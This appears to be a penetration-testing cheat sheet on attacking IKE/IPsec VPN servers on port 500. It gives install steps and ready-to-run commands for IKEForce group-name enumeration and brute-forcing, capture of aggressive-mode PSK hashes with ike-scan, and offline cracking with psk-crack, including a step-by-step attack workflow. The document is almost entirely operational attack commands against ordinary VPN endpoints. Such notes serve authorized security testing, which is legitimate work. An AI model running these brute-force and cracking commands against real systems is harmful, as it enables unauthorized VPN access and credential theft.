# 500 - IKE (IPSEC)

###  IKEFORCE 

Use IKEForce to enumerate or dictionary attack VPN servers. 

Install: 

```
pip install pyip 
git clone https://github.com/SpiderLabs/ikeforce.git 
 
```

Perform IKE VPN enumeration with IKEForce: 

`./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic` \
 

Bruteforce IKE VPN using IKEForce: 

`./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1` 

### ike-scan 

```
ike-scan TARGET-IP 
ike-scan -A TARGET-IP 
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
```

 IKE Aggressive Mode PSK Cracking 

1. Identify VPN Servers 
2. Enumerate with IKEForce to obtain the group ID 
3. Use ike-scan to capture the PSK hash from the IKE endpoint 
4. Use psk-crack to crack the hash 

Step 1: Identify IKE Servers (uses <https://github.com/portcullislabs/udp-proto-scanner>)

`./udp-protocol-scanner.pl -p ike SUBNET/24`&#x20;

Step 2: Enumerate group name with IKEForce&#x20;

`./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic`&#x20;

Step 3: Use ike-scan to capture the PSK hash&#x20;

`ike-scan –M –A –n example_group -P hash-file.txt TARGET-IP`&#x20;

Step 4: Use psk-crack to crack the PSK hash&#x20;

`psk-crack hash-file.txt`&#x20;

Some more advanced psk-crack options below:&#x20;

```
pskcrack 
psk-crack -b 5 TARGET-IPkey 
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key 
psk-crack -d /path/to/dictionary-file TARGET-IP-key 
```